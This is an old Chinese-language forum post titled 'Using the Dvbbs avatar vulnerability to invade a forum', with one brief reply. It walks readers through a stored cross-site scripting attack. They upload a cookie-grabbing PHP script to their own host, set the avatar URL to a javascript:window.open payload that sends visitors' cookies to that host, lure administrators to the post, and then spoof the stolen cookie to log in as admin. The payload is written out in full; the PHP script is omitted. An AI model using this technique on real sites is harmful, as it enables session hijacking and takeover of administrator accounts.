利用动网头像漏洞入侵论坛

[这个贴子最后由Hacker57在 2003/11/22 02:11am 第 1 次编辑] 话不多说，直接进入主题！ 打开论坛，先申请一个ID ,然后修改此ID的基本资料，找到“自定义头像地址”一栏。 嘿嘿！我这里将图象的URL地址改成一个自动蹦出有自动隐藏的窗口，而这个窗口中的php脚本的功能是获取Cookie。 将如下 php脚本保存在记事本里： 然后保存为******.php文件，将此脚本上传到自己的网站空间中，地址为：http://www.skyapex.net/******.php。 再在论坛头像地址栏里输入如下代码： javascript:window.open('http://www.skyapex.net/******.php?'+documents.cookie) 然后提交完成。 （注意：*字符号可任意取） 接下来要做的就是要吸引管理员来看你发的帖子了（注意：任何人只要浏览了你发的帖子，他的Cookie都会被你截获！）那么我们就可以利用Cookie欺骗以管理员的身份登陆论坛了，具体怎么做，我就不多说了！不过我可以告诉大家，在这里我们所要用的的工具有：欺骗工具ieCookiesview

看了 有点晕哦